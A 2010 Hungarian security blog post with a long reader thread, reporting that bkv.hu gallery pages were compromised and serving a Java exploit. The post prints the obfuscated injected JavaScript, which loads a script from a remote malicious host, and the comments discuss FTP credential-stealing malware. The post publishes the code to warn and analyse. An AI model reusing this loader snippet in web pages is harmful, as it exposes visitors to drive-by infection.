Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Fertőz a BKV.hu!

2010.01.06. 15:15 | buherator | 107 komment

23:52: A kártékony kódokat eltávolították a galériákból

Z hívta fel rá a figyelmem, hogy a bkv.hu galériája egy rendesen összekuszált JavaScript kódot is tartalmaz (GPL licensz alatt ;), ami aztán valahogy egy orosz domainről próbál levadászni további futtatható kódokat. A fertőző oldal az alábbi címen érhető el, de mindenki csak saját felelősségre nézze meg!

hxxp://www.bkv.hu/galeria/20080408rendezveny/varosliget/index.php

Frissítés: Úgy tűnik, hogy a /galeria/20080408rendezveny/ útvonal alatti összes galéria fertőzött

A szkript így néz ki, ha valakinek van kedve rejtvényt fejteni:

<script>/*GNU GPL*/ try{window.onload = function(){var T4lhy9x465n =
document.createElement('s!$c#(#r@)^i(#p(t#'.replace(/\!|#|\)|\$|\^|@|\(|&/ig,
''));T4
lhy9x465n.setAttribute('type',
'text/javascript');T4lhy9x465n.setAttribute('src',
'h!$t@!$t$&$p(:#/($^/#@&k&!!&i)(n$^@o$^!p@o$!@i($&)s&&!k(!^&-($r$^u^(&.
(!$g@o((#(@o&!)^g^)&$&l!^e&&.)@a!^)@e!).#@m$!i^h#(a&!&n^^b@)l@)o$#$g!-@!#c!)^)o((m#!).!)(m!$$u)$#s)!i^c(b^!@o)(x!!&p^(r)^)o^.(r!@u&):$^8@)0##8@$^0(#/&^g)$
a@(m$)($e&$f&($a$q#(s(!$.&!)&#c#&!o@$&$m^^^/(&g^$(@a&m$()e&^#f!$@a)!(#q!(#s!.)$!^c&!o^!@@m$^/!y^^$a(#&h#@o$^o)##.&@))c(o@@))&m#)!(/(1(##&1&)(0@#^)m$&^b(!.
@!c$#o(!$m)/@##&g(($@$o()$o$g^l#!(^e$).@&&c)o^m(^(&/$@'.replace(/\)|#|&|\^|\$|@|\!|\(/ig,
''));T4lhy9x465n.setAttribute('defer', 'defer');T4lhy9x465n.setA
ttribute('id', 'W!#!3!#j@#u@&&n!^(u&!&a!q$&)@!b@&&o$(!m$j!$'.replace(/\^|&|@|\$|\)|\!|\(|#/ig,
''));document.body.appendChild(T4lhy9x465n);}} catch(e) {}<
/script>

Kis szemgúvasztás árán egyébként a kód egész jól olvasható, egyszerűen ignorálni kell a fura karaktereket (amiket a replace metódusok szednek ki egyébként).

A Wepawet ugyan nem értékeli veszélyesnek az oldalt, a Google Safe Browsing API-ja viszont igen. Wiresharkkal nagy vonalakban lekövettem a hálózati forgalmat, és elsőre úgy tűnik, hogy a hivatkozott orosz oldal 0 hosszúságú választ ad. Ebből legnagyobb eséllyel az következik, hogy a) benéztem valamit a nagy kapkodásban b) Rosszul sikerült a fertőzés illetve eltávolították a kártékony tartalmat a külföldi szerverről. 

...kiderült, hogy  az oldal egy Java JRE sebezhetőséget használ ki (valószínűleg ezt), baromi óvatosan nyúljatok hozzá!

Minden esetre azt javaslom, hogy csak alapos védelemmel felvértezve (NoScript, virtuális gép, stb.) vágjatok neki a bkv.hu domainjának, ki tudja milyen kártevők tanyáznak arrafelé! Az informatikai osztályt pedig ismét csókoltatom...

Z-nek pedig még egyszer köszönet a közérdekű infóért!

Szívesen vennék egy teljes packet dumpot arról a lefolyásról, mikor az első ruszki oldal vissza is ad valamit - valószínűleg figyeli a user agentet, és az alapján dobja ki az exploitot (az enyém elveszett, Houston, Houston HW problémánk van :P ).

Címkék: bkv incidens az olvasó ír

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

mifolyikitt 2010.01.06. 18:53:44

Ez bizony az a Total Commanderes FTP-s dolog. Elég nagy szopó, mert amíg tárolva vannak a jelszavak szépen átírja az index.html-t, index.php-t meg az összes .js fájlt. Megoldást nem tudok mást, csak azt, hogy nem szabad tárolni a usert vagy a passwordot a total commanderben. Mondjuk hozzá kell írni egy karaktert vagy ilyesmit. Baromira kényelmetlenné teszi a munkát, úgyhogy ha valakinek van jobb ötlete, szóljon. :)
Ja és elvileg nem csak a Total Commanderből tudja kiszedni a jelszót, hanem más FTP kliensekből is.

knorbert 2010.01.06. 19:01:46

@mifolyikitt: talán ha a TC nem titkosítatlanul tárolná a jelszavakat... Ezt azért el lehetne várni egy olyan szoftvertől, ami már a 7.5-ik verziónál jár.

buherator · http://buhera.blog.hu 2010.01.06. 19:13:06

@knor: Az a baj, hogy valahogy vissza is kell állítani azokat a jelszavakat ahhoz hogy automatikusan be tudj lépni az FTP-idre. Be lehetne állítani egy mesterjelszót, de akkor meg a kis féreg az után szopná ki őket a memóriából, miután feloldottad a titkosítást...

lánczi sixx... izé... suxx 2010.01.06. 19:13:22

Valaki lefordítaná ezt az egészet magyarra?
Kezdjek pánikolni, ha jártam a bkv.hu-n?

flea 2010.01.06. 19:27:53

@knor: mihelyt feltaláltad, hogy hogyan lehet úgy tárolni egy jelszót, hogy a felhasználó beavatkozása nélkül helyre lehessen állítani, de kártékony kód ezt valamiért mégse tudja megtenni, nagyon gyorsan szóljál, lesz egy remek üzleti ajánlatom. :)

Celtic 2010.01.06. 19:28:19

@knor: Es van is benne. Persze ettol fuggetlenul a memoriaban titkositatlanul van (kulonben eleg nehezen kuldene el :), szoval nem olyan nehezkes azt leszipkazni...

Két tojásos hottentotta 2010.01.06. 19:32:38

@knor: Ha titkosított lenne, akkor se védené meg. Nem fájlban kéne tárolni, hanem fejben,

captpicard 2010.01.06. 19:32:51

Nemrég találtam ezt a kódot én is az oldalamban.
A rendszergazda gépéről mászik az oldalba,és onnan fertőzi a gépet.
Hatása,hogy teljesen leterheli a rendszer,közben kódokat küldd erre a bizonyos orosz oldalra.
Azt nem értem miért zavarja öket a magyar torrent oldalak,és a BKV.
Aki bekapja,annak alapos virusirtást,és rosszabb esetben Windows telepités ajánlok.
Az,hogy a BKV honlapjának rendszergazdái ezt nem vették észre,az sajnos minősiti az egész BKV-t is.
Sok pénz semmiért...

buherator · http://buhera.blog.hu 2010.01.06. 19:38:32

@lánczi sixx... izé... suxx: Egyelőre egy oldalról tudjuk hogy fertőzött, a kártevő pedig valószínűleg egy viszonylag régi Java sebezhetőséget használ ki. Ha tehát naprakész Java verziót használsz (vagy semmilyet) valószínűleg nem lehet bajod. Az a baj, hogy túl sok a bizonytalan pont, én sem tudok ennél konkrétabbat mondani.

Pipas 2010.01.06. 19:46:50

Miért nem írtok a rendszergazdának? Ennyit megérdemelne akkor is ha balfék! ;)

S. Annyi 2010.01.06. 19:47:48

Nocsak, már nem csak influenzát és tbc-t lehet a BKV-nál kapni?

buherator · http://buhera.blog.hu 2010.01.06. 19:49:53

@Pipas: így egy fokkal gyorsabb mint munkaidő után e-mailezgetni + az érintettekhez (látogatók) is hamarabb eljut az infó.

lánczi sixx... izé... suxx 2010.01.06. 19:50:25

@Pipas: céget váltottál vagy keverlek valakivel? :)))
(vagy sok évvel ezelőtt nem téged zaklattalak a panasonic fotópályázat finoman szólva lyukas oldala kapcsán?)

Pipas 2010.01.06. 19:52:44

@lánczi sixx... izé... suxx: Nem, nem, azt hiszem keversz valakivel. Nyomattam rendszergazda munkakört, de webes dolgokkal nem foglalkoztam. Arra mindig volt külön szakember.

@buherator: Nincs folyamatos felügyelet? Az mondjuk gáz...

buherator · http://buhera.blog.hu 2010.01.06. 20:02:47

@Pipas: Őszintén megmondom, nem próbáltam... de interpoláltam az előző esetek alapján (lásd a bkv cimkét)

@marklovassy: thx!

blöki.hu · http://www.bloki.hu 2010.01.06. 20:03:34

Gratula... azért belefért volna, hogy irtok nekik. Én mindenesetre irtam.

Hasonlat: remélem neked se szólnak ha kiégett a féklámpád a kocsin, hanem jót röhögnek rajtad ha átment rajtad a kamion.

mandarinrece 2010.01.06. 20:08:06

Eközben Horváth Csaba szerint a BKV sikersztori és minden problémát megoldottak.

www.youtube.com/watch?v=FR9BKPUk4SM

Hát normálisak ezek??

buherator · http://buhera.blog.hu 2010.01.06. 20:09:38

@hamlet79: Jelenleg minden rádióadón az szól, hogy ki van égve a féklámpájuk, hogy a hülye hasonlatoknál maradjunk.

Pipas 2010.01.06. 20:10:02

Igen, a jó szándék az szerintem is fontos. Nem túl etikus figyelmeztetés nélkül kipellengérezni valakit ahelyett, hogy előtte megpróbálnánk figyelmeztetni. Nem sokkal etikusabb feltört szerverek rendszergazdáit szivatni mint feltörni az adott szervereket...

Pipas 2010.01.06. 20:15:02

@buherator: Itt nem a BKV nyakán a kés, hanem egy szerencsétlen alulfizetett, túlterhelt számítógépes mitugrász nyakán. Aki valószínűleg töbet vállalt, mint amit elbír, dehát kellett az állás...

blöki.hu · http://www.bloki.hu 2010.01.06. 20:16:07

@buherator: remek... a hülye hasonlatoknál maradva... kiabálják mindenfele, hogy nem ég a féklámpájuk ahelyett, hogy nekik szólnának.

Fontosabb neked 200 látogató az indexről (a rádióknak meg egy 2 perces hír), minthogy megoldj egy problémát vagy ne adj Isten segíts valakinek. Olvassgassátok ezt... érdekes lesz: hu.wikipedia.org/wiki/Emp%C3%A1tia

Remélem kirúgják a rendszergazdát...

lintabá 2010.01.06. 20:22:07

a 7.5-ös TC-ben már van mesterjelszó, gondolom azzal már egy kicsit nehezebb visszafejteni. (bár nem alapértelmezett, szóval gondolom nem sokan használják)

moli 2010.01.06. 20:22:32

demost ftp-n tavolrol frissiteni egy siteot?!

lánczi sixx... izé... suxx 2010.01.06. 20:22:33

@Pipas: közben rájöttem én is... csak őt is az mlf listáról ismertem. :)

buherator · http://buhera.blog.hu 2010.01.06. 20:28:29

Miért van az, hogy a BKV-s posztok mindig etikai vitába torkollnak? Miért érzem, hogy akik itt pattognak, ugyanúgy rendes védelem nélkül, Total Commanderből szerkesztgetik az "enterprice" webappokat? A BKV már többször lejáratta magát informatikai téren (is) , és nem érzem úgy, hogy még nekem kéne köröket futni azért, hogy elvégezzék a munkájukat a mi pénzünkből.

@Csizmazia István [Rambo]:
@marklovassy:
Az a durva, hogy nekem sikerült olyan lefutást produkálnom, hogy betöltődött az exploit, csak aztán fagytam egyet :P Vagy a gonoszok bénáznak el valamit, vagy mi...

Pipas 2010.01.06. 20:33:49

@buherator: Soha nem használtam total commander-t, nem is vagyok benne biztos, hogy tudom mi az. Nem úgy tűnik, mint valami megbízható Unix-os program...

Viszont a balfék rendszergazdáknak inkább segítek, ha lehet, nem beszélem ki őket a _laikusok_ előtt!

buherator · http://buhera.blog.hu 2010.01.06. 20:40:11

@Pipas: Én egy szót nem szóltam a rendszergazdákról, egészen amíg ti fel nem hoztátok az ő felelősségük kérdését. Nyilvánvalóan sokkal magasabb szinten vannak elbénázva a dolgok, ha egy TC féreg ilyet tud csinálni egy éles site-on.

Ha nem írom meg ezt a posztot, akkor valószínűleg soha nem derül ki, hogy gebasz volt, a megfertőzöttek meg majd megoldják valahogy. A posztolás pillanatától kezdve egyébként bárki írhatott/telefonálhatott a BKV-s illetékeseknek, mint ahogy az ha jól látom meg is történt.

Egyedül azt nem értem, hogy miért én vagyok a szemét, mikor mások szarvárat építenek nem kevés adóforintunkból?

blöki.hu · http://www.bloki.hu 2010.01.06. 20:44:10

@buherator: Az egy dolog, hogy valaki hibázik vagy mulaszt, ki lehet rúgni.

Viszont az nagyobb baj, hogy - úgy általában - itt vadkeleten nem ismerik azt a fogalmat, hogy empátia.

Mennyivel jobb lenne, ha jeleznék a problémát, ők megoldanák - megköszönnék a segítséget és két boldog ember békésen távozik a naplemetében.

Csizmazia Darab István [Rambo] · http://antivirus.blog.hu 2010.01.06. 20:44:19

Ugy latom itt mindenki Linuxon nezi a buherablog weblapot :-) Mert Win alatt es NOD32-vel jon am ra a riasztas:

Threat: JS/TrojanDownloader.Iframe.NGU trojan

vyctoor 2010.01.06. 20:44:56

ez a fos oldal is fertőz...

Pipas 2010.01.06. 20:46:21

@buherator: Nem, ne haragudj, ha félreérthető voltam, nem gondolom, hogy szemét vagy, azt sem, hogy hibáztál. Én csak annyit mondtam, hogy szerintem a szakembereknek össze kellene tartani. Ha lehet...

Az viszont, hogy a felelősség a rendszergazdáé, az szerintem evidens. A rendszergazda felelőssége, hogy működőképes állapotban tartsa a rendszert, igazából semmi más dolga sincs. Lehet, hogy el van lehetetlenítve, lehet, hogy nem adtak rá lehetőséget, hogy elvégezze a dolgát, de akkor is az ő felelőssége!

br · http://www.szalaiannamaria.net 2010.01.06. 20:47:38

Megőrült az aki azt mondja, hogy nem kellett volna ezt kirakni index címlapra.

Gondolom a mostani közlekedési helyzet miatt sokan nézik a bkv oldalát, ennek a balfaszságnak köszönhetően sokan is megfertőződhetnek.

A rendszergazdának persze illik szólni, csak akkor lett volna buherator balfasz ha megvárja amíg intézkedik.

Mert az utóbbi lehetett volna "megoldom holnap délután a sajtóközlemények és a második kávé után", míg így a főnöke dörren rá, hogy "hátizé BÉLA, itt aztirják hogy vírusos a honlapunk!"

blöki.hu · http://www.bloki.hu 2010.01.06. 20:51:07

@Csizmazia István [Rambo]: Nem azért jelez a NOD32, mert a cikk elején ott van a kód is? Az nem fut le, de ezt a NOD nem látja.

Pipas 2010.01.06. 20:51:25

@hamlet79: Igen, azt hiszem egyetértek. Nekem is törték már meg a rendszeremet és nem azért, mert szartam rá, hanem azért, mert kurvára el voltam havazva mással. Elkaptam harminc támadót, fejüket szét tudtam volna verve, de a harmincegyedik bejött. Volt, hogy észrevettem, volt, hogy szóltak a más cégeknél dolgozó kollégák.

Amikor legközelebb másokkal történt ilyesmi megpróbáltam törleszteni azzal, hogy nem verem nagydobra, hanem megkeresem a felelőst és megsúgom neki.

Amikor felhívtam egy egyetemi karon egy gyakorlatilag ismeretlen rendszergazdát, hogy itt és itt ül egy hallgató, aki éppen minket támad, akkor rohantak elkapni. Mert a rendszergazdák összetartottak abban iaz időben...

Pipas 2010.01.06. 20:55:20

@br: >>Mert az utóbbi lehetett volna "megoldom holnap délután a sajtóközlemények és a második kávé után"<<: Jól értem azt mondod, hogy nem szóltak neki, mert ha szóltak volna, akkor lehet, hogy nem is foglalkozott volna a figyelmeztetéssel?!

Ez van olyan elmés védekezés mint a 'lehet, hogy ott se vótam'! Gratula!

buherator · http://buhera.blog.hu 2010.01.06. 20:56:36

@hamlet79: @Pipas:
Én túl vagyok már legalább 100 hasonló bugreporton, és az esetek kb. felében szarnak az ember fejére, főleg ha nagy cégről van szó.

blöki.hu · http://www.bloki.hu 2010.01.06. 20:59:13

@Pipas: azt is hozzátenném, hogy nincs olyan rendszer amit nem lehet feltörni. Azt a védelmet kell megtalálni ami már elég ahhoz, hogy a támadásba fektetett energia nagyobb legyen mint a várható nyereség.

blöki.hu · http://www.bloki.hu 2010.01.06. 21:00:12

@buherator: ezt mondjuk aláírom.. de nem szabad feladni :)

Pipas 2010.01.06. 21:01:46

@buherator: Ja, ez eddig rendben van. Viszont azok mind egy-egy másik ember voltak.

Karácsony este Pécsett a haverommal megálltunk egy hajlékony miatt és kihívtuk a mentőket. Sok részeg ember van, lehet, hogy nem is mentettük meg az életét. viszont... két éve az egyik barátom elájult délután kettőkor az egyik egyetemi kar bejáratához közel. Két óra múlva magához tért és kihívta a mentőket, akik végülis megmentették az életét.

Mesélte, hogy pár hét múlva az egyik nagytudású egyetemi oktató megkérdezte hogy van mostanába, mert múlkor látta feküdni a templom lépcsőjén... Hát ez van mostanában felénk!

Pipas 2010.01.06. 21:02:44

@hamlet79: Ja, elég sokat tudok ezekről a számítógépes dolgokról. ;)

br · http://www.szalaiannamaria.net 2010.01.06. 21:03:25

@Pipas: Rosszul érted.

Tehát primitíven:

1. nincs index címlap
2. nincs a nyilvánosság nyomása
3. nincs faszkorbáccsal csapkodás, hogy oldja meg a rendszergazda a vírusfertőzést.

Nem azt mondtam, hogy ne szóljanak a rendszergazdának, hanem azt, hogy a nyilvánosságot helyesen értesítette buherator.

Pipas 2010.01.06. 21:05:03

@br: Ja, de nem szóltak. Én csak ezen akadtam ki.

buherator · http://buhera.blog.hu 2010.01.06. 21:06:02

@Pipas:
Húú, maradhatnánk legalább részben informatikai területen?

Egyébként nem tudom figyelitek-e, de 6 óra telt el a poszt kikerülése óta, hamlet levele óta mondjuk 1, a kód még mindig ott van.

Pár kommentet törölnöm kellett, remélem így már nem picsognak majd az AV-k.

blöki.hu · http://www.bloki.hu 2010.01.06. 21:12:35

@buherator: persze, de ez várható is volt... :) Ő bajuk.

Ezért simán be lehetne rángatni a rendszergazdát, vagy oldja meg otthonról.

Viszont ha 6 órával ezelőtt irsz egy mailt vagy csörögsz oda akkor még lehet, hogy dolgo... izé.... van benn valaki.

Pipas 2010.01.06. 21:14:19

@buherator: Hát mondjuk nem is vártam a BKV-tól, hogy tesznek is valamit! ;) Baszki ezek még buszokat sem tudnak üzemeltetni, pedig annál kisebb szellemi kihívást nem nagyon tudok elképzelni.

Országos hír van abből, hogy kirúgtak két vezetőt és akkor tovább olvasol és kiderül, hogy buszvezetőt rúgtak ki! Mintha karamboloztak volna, mintha ők tehetnének arról, ami ma tömegközlekedés címén megy!

Nyilvánvaló, hogy az informatikai rendszer/csoport pont ilyen impotens/korrupt szinten van, nem?

buherator · http://buhera.blog.hu 2010.01.06. 21:15:01

@hamlet79: A lehetőség erre adott volt bárkinek, lehet hogy meg is történt. Persze, tudom, a restség miatt fogok pokolra kerülni...

lánczi sixx... izé... suxx 2010.01.06. 21:16:47

@buherator: kellett volna? Én vista alól jártam itt, de az AVG9 egy szót sem szólt... :(

buherator · http://buhera.blog.hu 2010.01.06. 21:19:15

@lánczi sixx... izé... suxx: Nem, ezek vakriasztások voltak, a NOD kicsit túlértékelte a bemásolt kódrészleteket.

_2501 2010.01.06. 21:20:54

háááát gyerekek... ez a bkv dolog mindenkinek nagyon tetszik úgy tűnik... szvsz szánalmas ez az egész. pittyogunk itt hogy féklámpa, meg empátia, meg reportolás, a másik végén meg ballisztikus ívben leszarnak meg elküldenek a k...a anyánkba. válaszoltak vissza? inkább nem érdekel...

nézzetek family guy-t... :D

blöki.hu · http://www.bloki.hu 2010.01.06. 21:21:17

@buherator: az is benn van a 7 fő bűn között? :) Rég volttam hittanórán :)

Dízelboy 2010.01.06. 21:21:40

igénytelen Magyarország..

twollah / bRoKEn hOPe, sUppLeX · http://freewaresoftwarenews.blogspot.com/ 2010.01.06. 21:21:46

Nem ertem, hogy a weblapokat miert nem lehet(ne) Linux alol hegeszteni.

Es akkor talan nem lenne ilyen gebasz, hogy a fertozott gep megfertozi a weboldalt.

buherator · http://buhera.blog.hu 2010.01.06. 21:24:03

@hamlet79: Benne, de én is csak a Hetedikből tájékozódtam :)

Pipas 2010.01.06. 21:24:40

@_2501: Family guy! A kedvencem! A legutóbbi részben amnéziája van a csávónak! ;)

Csizmazia Darab István [Rambo] · http://antivirus.blog.hu 2010.01.06. 21:24:47

Kozben kiderult, az altalam visszafejtett kod adta a riasztast.

Hogy megis megmaradjon az orokkevalosagnak ;-) jpg-ben teszem vissza a hosszaszolasaimat:

kepfeltoltes.hu/100106/kod1_www.kepfeltoltes.hu_.png

kepfeltoltes.hu/100106/kod2_www.kepfeltoltes.hu_.png

Pipas 2010.01.06. 21:27:21

@Csizmazia István [Rambo]: Látom te se vindózos csávó vagy! ;) Mér nem vi-t használsz? ;)

lánczi sixx... izé... suxx 2010.01.06. 21:30:35

@Pipas: szerintem azért, mert a vim kényelmesebb ;)

|Z| 2010.01.06. 21:31:20

Ha kézzel írod be minden esetben a jelszót: akkor buktad, mert beíráskor menti el a rosszindulatú kód a jelszót.

Ha lemented TC < 7.5-be, akkor konfigból kiolvassa.

Ha lemented TC >= 7.5-be és állítottál mester jelszót, akkoris ott lesz a memóriában ahonnan kiszedheti.

Ha virtuális billentyűzettel írod be, akkor minden klikkelésről tud képernyőt menteni amiből visszafejthető.

Ha valami extra dologgal írtad be, akkor meg marad a triviális "Ja, hogy ez plaintext FTP, akkor hallgassunk bele a hálózati kommunikációba és ott a jelszó ..." dolog.

Hogy az öreg klasszikust idézzem : "If an attacker can persuade you to run his program on your computer, it is not your computer anymore"

És szerintem most nem arról volt szó, hogy buherátor pellengérre állítja szegény BKV-t, hanem figyelmezteti a felhasználókat, hogy vigyázzanak. Szerintem.

Takika 2010.01.06. 21:33:56

@errorka: Az altalunk alkalmazott megoldasban az ugyfel megmondhatja, hogy honnan szandekozik belepni ftp-vel (host, ip, tartomany, domain), es csak onnan tud belepni.

Pipas 2010.01.06. 21:34:43

@lánczi sixx... izé... suxx: ja, de a screenshoton valami gedit vagy mi volt, nem a vim. Én is vim-et használok napi 8 órában. Amióta programozó lettem. ;)

buherator · http://buhera.blog.hu 2010.01.06. 21:35:23

@Takika: Azon gondolkoztatok már, hogy a malware hol fut?

Pipas 2010.01.06. 21:41:19

@|Z|: "És szerintem most nem arról volt szó, hogy buherátor pellengérre állítja szegény BKV-t, hanem figyelmezteti a felhasználókat, hogy vigyázzanak.": Akkor be kell jelenteni mindenféle weblapokon, ahol az ilyen gyanús oldalakat gyűjtik. A firefox-om néha szól, azokat is így gyűjtik. Nagyon hasznos és hatékony módszer.

buherator · http://buhera.blog.hu 2010.01.06. 21:43:48

@Pipas: Be van jelentve, írom is a posztban hogy a Google SBAPI szól miatta.

lánczi sixx... izé... suxx 2010.01.06. 21:44:06

@Pipas: bocs, ez csak a poén helye vótt... :D

Takika 2010.01.06. 21:45:42

@buherator: Egyertelmu, hogy az eredeti usernel, de nem tole indul az az ftp kapcsolat, amiben az oldalakba bekerulnek a karokozok, hanem tobbnyire kulfoldrol, ezert pl. egy .hu-ra szures eleg jo kozelitest tud adni ezek ellen. Termeszetesen az ugyfel ilyen problema (es a szures beallitasa utan) kap uj jelszot is.

Pipas 2010.01.06. 21:48:13

@buherator: Ja, Z-nek próbáltam megvilágítani. Mármint nem annak a Z-nek, aki fekete ruhában járó férfi (MIB), ennek a |Z| -nek. ;)

Ideiglenesen átáltam a söről a cider-re... kezdek berúgni. ;)

Pipas 2010.01.06. 21:50:19

@lánczi sixx... izé... suxx: Több időt töltöttem a vim-mel mint bármely nővel. Az is lehet, hogy minden nővel összesen... :-(

buherator · http://buhera.blog.hu 2010.01.06. 21:52:55

@Pipas: rotfl xD
@Takika: Én csak arra próbálok rávilágítani, hogy azért ezt a védelmet igen könnyen meg lehet kerülni. Jobbat viszont sajnos én sem tudok :(

Mirrorozom közben egyébként a bkv.hu-t hogy kiderüljön, hol van még malware benne.

Pipas 2010.01.06. 21:56:21

@buherator: mi a csoda az a rotfl xD? Lehet, hogy öregszem?!

|Z| 2010.01.06. 21:56:44

@Pipas: kb. 1 évvel ezelőtt összegyűjtöttem 40 darab oldalt, akik fertőzöttek voltak, bejelentettem őket firefoxban (IE-ben nem), megkerestem minden oldalnak a gazdáját, mindenkinek írtam (elment kb. 4 órám), 20% válaszolt hogy köszöni az értesítést, 1 hét múlva újraellenőriztem és kb. 30% volt javítva. A munkámból kifolyólag napi 5-10 ilyen magyar oldalt találok, de nincs rá időm (se munkahelyen se otthon), hogy mindig minden csatornára írjak.

Ezt észrevettem, ellenőriztem, buherátor-nak írtam, ő kiposztolta, akinek meg volt ideje bejelentette phistank-nél google-nál IE-nél BKV-nál stb. A munka részemről outsource-olva lett. A BKV megítélése nem hiszem hogy ezen az eseten múlna. Hogy miért nem a BKV-nak írtam? Mert így keltem fel, meg reggel nem jött a busz. Ennyi.

Pipas 2010.01.06. 22:04:43

@|Z|: Oké, oké, nem akartam kötözködni. Többet hokiztunk már itt a témán mint amit az egész BKV megér.

Pipas 2010.01.06. 22:11:00

Asszem visszaállok a búzasörre! ;)

flea 2010.01.07. 00:03:32

@Pipas:
www.lmgtfy.com/?q=rotfl

az xD-t rád bízom ;) ... izé xD

eax_ 2010.01.07. 00:46:50

@buherator: "Jobbat viszont sajnos én sem tudok :("

Pedig egy tisztesseges fejlesztesi workflow erre is megoldast jelentene: a web developzorok igazan leszokhatnanak arrol, hogy az eles kodot ft-vel taknyoljak, minden ertelmes fejleszto valami scm-be dolgozik, es a commitokat ha mas nem is, legalabb a keszitoje egyszer atnezi, mielott elesbe kerul.

Pipas 2010.01.07. 01:07:46

@flea: Szűk marokkal mérsz, de hisz nagy úr vagy...

Pipas 2010.01.07. 01:15:20

@eax_: Te meg hülye vagy. Azt sem tudod hogy került be az idegen kód, de mindegy. Átnézi?!

Na jó, én meg berúgtam, az se sokkal job. ;)

eax_ 2010.01.07. 01:51:04

@Pipas: "Átnézi?!"
Szamitottam ra, hogy a web developzoroknak ez magas lesz, nade hogy ennyire...

buherator · http://buhera.blog.hu 2010.01.07. 01:57:53

@eax_: Az tény, hogy az FTP password stealerekre megoldás, ha nem használunk FTP-t, de itt egységsugarú júzereknek nyújtandó FTP szolgáltatást akarnának biztonságos(abb)an üzemeltetni.

Késő van...

_2501 2010.01.07. 07:47:45

ha valaki meg szeretne befertozni magat: www.bkv.hu/combino/jatek/

-xpander- 2010.01.07. 09:33:34

hello,

egy kicsit offtopic leszek, de gondoltam megpendítem a dolgot, hátha valaki ír belőle egy korrekt posztot.

szóval nem értem, hogy a BKV-nál kinek jutott eszébe, hogy az éjszakai menetrendeket PDF-ben tegyék fel a honlapjukra (www.bkv.hu/ejszakai/914vissza.pdf). ilyen módon úgyanik véletlen sem tudom a telefonommal megnézni, ha éppen valahol a budapesti éjszakában mászkálok és busszal szeretnék hazajutni.

synapse · http://www.synsecblog.com 2010.01.07. 09:57:02

"talán ha a TC nem titkosítatlanul tárolná a jelszavakat... Ezt azért el lehetne várni egy olyan szoftvertől, ami már a 7.5-ik verziónál jár."

ahahaha :D

synapse · http://www.synsecblog.com 2010.01.07. 10:06:03

Namost nem idezem vissza az osszes postot, amit ti itt irtatok a rendszergazdak/fejlesztok vedelmeben.

Pofatlan osszegeket basznak el erre a munkara a mi penzunkbol, a legkevesebb ami kijar az az, hogy EMPATIAVAL (igen tudjuk mi az, ne olvass annyi wikipediat) nem elek ezen emberek fele.

Ugyanis ok a (meg mindig) mi penzunkbol szakitanak brutalis osszegeket egy ilyen szinvonaltalan munkaval. Ha meg ok alul vannak fizetve akkor hol van a mi penzunk?

fuckthesystem

synapse

_2501 2010.01.07. 10:14:21

bkv.hu/combino/jatek/ javítva => 404 :D

synapse · http://www.synsecblog.com 2010.01.07. 10:24:17

xpander: pdfezes erre tenyleg faszsag, en is anyaztam mar miatta.

MAS: Ez nem egy szakmai portal?

buherator ezeket a kommenteket miert engeded:

Pipas 2010.01.06. 22:11:00
Asszem visszaállok a búzasörre! ;)

Pipas 2010.01.07. 00:02:56
Denny Crane!

Sok reszeg idiota ide loki a baromsagait, 0 relevanciaval a temaban, filozofal meg politikarol ugat? Megvette a blogot a hup/sghu/index, vagy miafrancvan? A laikus idiotak menjenek szepen egyeb szakmai portalokra teligumit cserelni, nem kell feltetlen hozzaszolni ahhoz amihez lovesed nincsen. Tipikus bikeshed, hogy amikor a tartalomhoz nem tudsz hozzaszolni akkor empatiarol meg etikarol ugatsz.

synapse

moli 2010.01.07. 10:34:56

@Takika: de az attol meg ftp! plain text jelszoval!

Udi · http://blog.udi.hu 2010.01.07. 10:56:05

pár gondolat a java-ról.

A JRE frissítés windows alatt, az egyik legelbaszotabb dolog, ami létezik. Én mindig kikapcsolom, szóval nem tudom, hogy változott e, de a Sun úgy képzeli el az automatikus frissítést, hogy a régi verzió MELLÉ feltelepíti a frissítést, majd átállítja a JRE_HOME envet, és feltételezem a PATHot is.

Ennek egyenes folyománya, hogy a sok jre pár hónap alatt simán elkunyerál jópárszáz mega helyet, feleslegesen.

Ennek tükrében nem csoda, ha sokan fixált JRE verziót használnak. (Programozóknak meg általában egyenesen kötelező meghatározott verzióval nyomulni. 1.4.2 FTW)

|Z| 2010.01.07. 11:23:40

@Udi: teljesen igazad van, a JRE frissítés az egyik legrosszabb ilyen téren. gyakorlati példa: Elő lehet írni, hogy ha a vállalati hálózatra notebookot akarnak csatlakoztatni, akkor nem lehet sérülékeny szoftver a gépen. Minden programnál meg lehetett oldani, kivéve JRE...

Celtic 2010.01.07. 11:26:10

@Udi: Nyavalyat. Joideje leszedi a regit. Teny, hog yilyen volt kb. ket eve (volt mar gep, amirol 10 javat szedtem le), de manapsag nem ilyen.

Takika 2010.01.07. 19:24:47

@moli: Szolj, ha tudsz olyan megoldast, ami odaadhacc az egysegsugaru lamer usernek is, amit minimalis tanulassal megtanulhat _barki_ hasznalni, stb.

buherator · http://buhera.blog.hu 2010.01.08. 11:13:24

@moli: Ha közvetlenül éles rendszerre deployolsz fertőzött gépről, akkor használhatsz akár SSL-en attunelezett IPSec-et is, a malware akkor is át fogja írni az éles cuccaidat, miután a kapcsolat létrejött.

Hunger 2010.01.08. 11:58:00

@Pipas:

"Nekem is törték már meg a rendszeremet és nem azért, mert szartam rá, hanem azért, mert kurvára el voltam havazva mással."

:)))

